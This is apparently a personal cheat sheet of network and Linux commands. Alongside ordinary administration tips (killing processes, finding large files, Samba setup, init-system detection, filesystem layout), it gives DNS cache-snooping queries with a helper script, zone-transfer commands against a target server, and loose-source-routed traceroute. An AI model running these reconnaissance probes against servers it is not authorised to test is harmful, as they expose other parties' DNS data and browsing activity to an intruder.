Network & Linux Tools

Traceroute

By default, traceroute sends UDP packets with incrementing destination ports, starting at the base port of 33434 and going up by one port for each packet sent (each hop is probed 3 times).

#Route the probes through the given gateway(s) (loose source routing; comma-separated, no spaces)
traceroute -g 10.10.10.1,10.10.10.2 10.10.10.10

#Use ICMP echo instead of UDP
traceroute -I 10.10.10.10

#Use TCP SYN instead of UDP
traceroute -T 10.10.10.10


Online Traceroute Websites:

1) Traceroute.org
2) Kloth.net/services/traceroute.php
3) tracert.com

nslookup

DNS cache snooping: check whether a record is already present in the resolver's cache by asking without recursion.

>nslookup

#a non-recursive query is answered only if the record is already in the resolver's cache
set norecurse
www.website.com

#a recursive query makes the resolver fetch the record if it is not cached
set recurse
www.website.com
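As an added example (not from the original notes), a small POSIX shell helper that scripts the same check with `dig +norecurse` (the equivalent of nslookup's `set norecurse`) and classifies the reply. The sample dig headers are constructed, and `snoop_check` assumes `dig` is installed.

```shell
#!/bin/sh
# Classify the reply to a non-recursive DNS query so that cache snooping
# can be scripted. A resolver that answers a non-recursive query with
# records has that name cached; an empty answer means it does not, and
# REFUSED means it will not answer non-recursive queries at all.

# snoop_verdict: read dig output on stdin, print cached / not-cached / refused
snoop_verdict() {
  out=$(cat)
  status=$(printf '%s\n' "$out" | sed -n 's/.*status: \([A-Z]*\),.*/\1/p' | head -n 1)
  answers=$(printf '%s\n' "$out" | sed -n 's/.*ANSWER: \([0-9]*\),.*/\1/p' | head -n 1)
  [ -n "$status" ] || { echo "unparsed"; return 2; }
  if [ "${answers:-0}" -gt 0 ]; then
    echo "cached"; return 0
  elif [ "$status" = "REFUSED" ]; then
    echo "refused"; return 1
  else
    echo "not-cached"; return 1
  fi
}

# snoop_check RESOLVER NAME: run the non-recursive query for real (needs dig)
snoop_check() {
  dig @"$1" "$2" +norecurse | snoop_verdict
}

# Constructed sample replies (only the header lines matter to the parser)
CACHED_REPLY=';; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4242
;; flags: qr ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1'
MISS_REPLY=';; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4243
;; flags: qr ra; QUERY: 1, ANSWER: 0, AUTHORITY: 13, ADDITIONAL: 0'
REFUSED_REPLY=';; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 4244
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0'

printf '%s\n' "$CACHED_REPLY" | snoop_verdict   # prints: cached
```

A resolver that returns "refused" for every name is not leaking its cache; only the cached/not-cached split is informative.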

#Zone transfer
dig @10.10.10.10 target -t AXFR

#Incremental Zone Transfer (N = the zone serial you already hold; only changes since that serial are returned)
dig @10.10.10.10 target -t IXFR=N

Kill a running Process/Open Port

#List listening TCP ports with the owning process
netstat -pant | grep LISTEN

#View the process ID
sudo lsof -t -i:80

#Kill the process
sudo fuser -k 80/tcp

Find Largest Files in Linux

du -a /var | sort -n -r | head -n 10

#Get Readable output
du -hsx -- * | sort -rh | head -10

Installing Samba on Kali Linux

sudo apt install samba
sudo mv /etc/samba/smb.conf /etc/samba/smb.conf.old

#edit the shared folder path
sudo nano /etc/samba/smb.conf

#set a Samba password for the (existing) Linux user kali
sudo smbpasswd -a kali

sudo systemctl start smbd
sudo systemctl start nmbd

Kill All process with a same name

ps -ef | grep 'myProcessName' | grep -v grep | awk '{print $2}' | xargs -r kill -9

or

#grep -v grep drops the grep command itself, which would otherwise match its own pattern
for KILLPID in $(ps ax | grep 'Process_NAME' | grep -v grep | awk '{print $1}'); do
  kill -9 "$KILLPID"
done

Kill a process running on a port

fuser -k 4444/tcp

Add a path to $PATH permanently

#add the export line to the end of ~/.bashrc (takes effect in new shells)
nano ~/.bashrc
export PATH="$PATH:/usr/local/go/bin"

Check Service Manager being used

ps -p 1 -o comm=

systemd: Indicates the systemd service manager.
init: Suggests the traditional System V init.
upstart: Implies the Upstart init system.

For systemd: If the systemctl command is available, it indicates systemd.
For System V init: If the service or /etc/init.d/ directory is present, it suggests the use of System V init.
For Upstart: If the initctl command is available, it suggests Upstart.


#List the process tree
pstree -p 1

This command will display the process tree starting from the init process. Look for process names or directories associated with specific service managers, such as systemd, upstart, or init.


Looking at Directories

Examine the /sbin directory: Look for specific executables or symbolic links in the /sbin directory that indicate the service manager. For example:

/sbin/init: Suggests SysV init.
/sbin/initctl: Suggests Upstart.
/sbin/systemctl: Indicates systemd.
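The checks above combined into one script, as an added example that is not part of the original notes: the name of PID 1 decides when it is unambiguous, and the presence of `systemctl`, `initctl` or `service` breaks the tie when PID 1 is just `init`. The tool list passed to `classify_init` is an assumption of this example, not an OS interface.

```shell
#!/bin/sh
# Decide which service manager a host runs.
# classify_init COMM TOOLS
#   COMM  = output of `ps -p 1 -o comm=`
#   TOOLS = space-separated list of the management tools found in PATH
classify_init() {
  case "$1" in
    systemd) echo systemd; return 0 ;;
    upstart) echo upstart; return 0 ;;
  esac
  # "init" is ambiguous: systemd and Upstart are often installed as /sbin/init,
  # so fall back to which management tool is present (most specific first).
  case " $2 " in
    *" systemctl "*) echo systemd ;;
    *" initctl "*)   echo upstart ;;
    *" service "*)   echo sysvinit ;;
    *)               echo unknown ;;
  esac
}

# installed_tools: list which of the three tools exist on this host
installed_tools() {
  for t in systemctl initctl service; do
    command -v "$t" >/dev/null 2>&1 && printf '%s ' "$t"
  done
  echo
}

# detect_init: run the real checks on the current host
detect_init() {
  classify_init "$(ps -p 1 -o comm=)" "$(installed_tools)"
}
```

Run `detect_init` on a live host; in a container PID 1 is usually the application itself, so expect "unknown" there.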

Linux Directories File Structure - Filesystem Hierarchy Standard (FHS)

1. `/sbin`: The `/sbin` directory contains system binaries (commands) that are primarily used by system administrators for system maintenance and management tasks. Some important binaries found in `/sbin` include:
   - `init`: The system initialization program (SysV init or systemd).
   - `shutdown`: Command to initiate system shutdown.
   - `reboot`: Command to reboot the system.
   - `ifconfig`: Tool for configuring network interfaces (deprecated in favor of `ip` command).
   - `fdisk`: Utility for partitioning disks.
   - `iptables`: Command for managing netfilter firewall rules (legacy; replaced by `nftables` in some distributions).

Other important directories in the Linux filesystem hierarchy include:

2. `/bin`: This directory contains essential command binaries that are required for normal system operation. These binaries are generally available to all users and are necessary for basic system functionality (e.g., `ls`, `cp`, `mv`, `mkdir`).

3. `/usr`: The `/usr` directory contains user-related programs and data. It has several subdirectories including:
   - `/usr/bin`: Non-essential command binaries for user access.
   - `/usr/sbin`: Non-essential system binaries used by system administrators.
   - `/usr/lib`: Libraries for programs in `/usr/bin` and `/usr/sbin`.
   - `/usr/local`: Programs and data specific to the local machine, often manually installed.

4. `/etc`: The `/etc` directory contains system-wide configuration files. It includes configuration files for various services, network settings, system startup, and more.

5. `/var`: The `/var` directory holds variable data files that are expected to change during system operation. It includes directories such as `/var/log` (system logs), `/var/spool` (print and mail spools), and `/var/www` (web server files).

6. `/home`: Each user on the system typically has a home directory under `/home`. User-specific files and configurations are stored here.

7. `/tmp`: The `/tmp` directory provides a location for temporary files that are accessible to all users. The contents of this directory are typically deleted upon reboot.

Troubleshooting: Network IP Address Already in Use